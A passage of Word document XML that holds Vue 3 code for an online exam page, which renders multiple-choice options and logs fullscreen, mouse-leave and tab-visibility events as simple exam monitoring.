    <w:p w14:paraId="6B14692A" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09135C02" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A954FEB" w14:textId="46BD73FF" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCC98B0" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25F64F58" w14:textId="6F58E6FC" w:rsidR="00615D6B" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>考试界面自动全屏</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BECA3B" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9"/>
    <w:p w14:paraId="3FDD312F" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t>&lt;template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B4BEBA" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t xml:space="preserve">  &lt;div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6805B990" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t xml:space="preserve">    &lt;el-checkbox-group v-model="selectedOptions" @change="handleOptionChange"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EACBAE7" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t xml:space="preserve">      &lt;el-checkbox :label="option.id" v-for="option in parseOptions(tableData.choice_text)" :key="option.id"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038B17D9" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t xml:space="preserve">        &lt;span class="spanFlex"&gt;{{ option.char }} {{ option.opName }}&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1E90D7" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t xml:space="preserve">      &lt;/el-checkbox&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A733A3" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t xml:space="preserve">    &lt;/el-checkbox-group&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1674E283" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t xml:space="preserve">  &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D227D74" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t>&lt;/template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F339804" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9"/>
    <w:p w14:paraId="095BB93C" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t>&lt;script setup&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDDD5DE" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t>import { getStuExamPaper } from "~/api/exam"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F62596D" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t>import { onBeforeUnmount, onMounted, ref } from 'vue';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0D71C8" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t>import { useRouter } from 'vue-router';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD2CE91" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t>import { useStore } from 'vuex'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4B3A09" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9"/>
    <w:p w14:paraId="3FFE4F4D" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t>const store = useStore()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A350355" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9"/>
    <w:p w14:paraId="7ECD9CDB" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从考试列表页面跳转入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>考试中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的试卷页面，获取试卷</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31077A9D" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t>const router = useRouter();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F7B906" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t>const examId = router.currentRoute.value.query.examId;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6881C271" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9"/>
    <w:p w14:paraId="550D49C8" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取试卷数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D46A99" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t>const tableData = ref([])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650A73D4" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9"/>
    <w:p w14:paraId="5D0A7CC8" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t>function getData() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7661ECA7" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t xml:space="preserve">  getStuExamPaper(examId)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C0C75E" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t xml:space="preserve">    .then(res =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAD2EFF" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t xml:space="preserve">      tableData.value = res.question_list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F0E246" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t xml:space="preserve">    })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71257829" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t xml:space="preserve">    .finally(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457FA9D7" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t xml:space="preserve">    })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA37B24" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B7EC59" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9"/>
    <w:p w14:paraId="11F2C4C3" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t>getData()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297329AF" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9"/>
    <w:p w14:paraId="4212E4EF" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解析选项字符串</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E56DCD" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t>function parseOptions(choice_text) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B24E88" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t xml:space="preserve">  return choice_text.split("|").map((optionText, index) =&gt; ({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507B70F3" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    id: index + 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA9074D" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t xml:space="preserve">    char: String.fromCharCode(65 + index), // A, B, C, D, ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3189D377" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t xml:space="preserve">    opName: optionText</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F824271" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t xml:space="preserve">  }));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133BA419" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72130BA6" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9"/>
    <w:p w14:paraId="5FB2E4D3" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>选中的选项</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0166DD" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t>const selectedOptions = ref([]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D421EC" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9"/>
    <w:p w14:paraId="0A263B78" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>处理选项变化</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C4312C" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t>function handleOptionChange(checkedOptions) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9F693C" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t xml:space="preserve">  console.log("Selected options:", checkedOptions);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A94ED33" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5CA587" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9"/>
    <w:p w14:paraId="53470A60" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>【考试监控模块】</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  -- Start --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6765F903" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无法通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> JavaScript </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>强制用户全屏并阻止使用键盘快捷键切出屏幕的。浏览器限制了这样的行为，以确保用户对自己的设备有控制权，防止滥用和滋扰。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0ED6C2" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9"/>
    <w:p w14:paraId="2A51B52F" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9"/>
    <w:p w14:paraId="1BA08459" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t>const isFullScreen = ref(false);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78020D9D" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t>const isPageActive = ref(true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D14496" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9"/>
    <w:p w14:paraId="5440EE68" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控全屏事件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A06E34C" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t>const handleFullscreenChange = () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554AD172" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>全屏后隐藏</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Aside</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同时也避免因</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Aside</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>导致“鼠标移出页面”的误判（鼠标移动到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Aside</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会导致误判）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3251DF67" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t xml:space="preserve">  isFullScreen.value = !!document.fullscreenElement;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F435DB" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9"/>
    <w:p w14:paraId="78C2D850" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t xml:space="preserve">  if (!isFullScreen.value) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F17962" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    console.log('</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户退出全屏</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCA9C69" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9"/>
    <w:p w14:paraId="26DF52FF" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t xml:space="preserve">    store.dispatch("setExamMode", false)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607FB503" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t xml:space="preserve">  } else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E500CA8" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    console.log('</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户进入全屏</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00025756" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t xml:space="preserve">    store.dispatch("setExamMode", true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DD2A99" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B81DCD" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295C3098" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9"/>
    <w:p w14:paraId="50C0F901" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控鼠标是否移除</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161D87A3" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t>const handleMouseOut = (event) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E93DC1" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t xml:space="preserve">  if (!event.relatedTarget || event.relatedTarget.nodeName === 'HTML') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF2B7CE" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    console.log('</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>鼠标移出页面</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D82377E" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0797DEED" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684FF134" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9"/>
    <w:p w14:paraId="5DE54030" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控页面是否活动</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDC6BA5" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t>const handleVisibilityChange = () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291A7C99" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t xml:space="preserve">  isPageActive.value = document.visibilityState === 'visible';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782AC362" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t xml:space="preserve">  if (isPageActive.value) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B968396" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    console.log('</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页面在前台活动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7842C411" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t xml:space="preserve">  } else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3468B152" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    console.log('</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页面在后台或最小化</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F67550E" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A36D1C1" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1419A086" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9"/>
    <w:p w14:paraId="362FEC21" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t>onMounted(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67827159" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
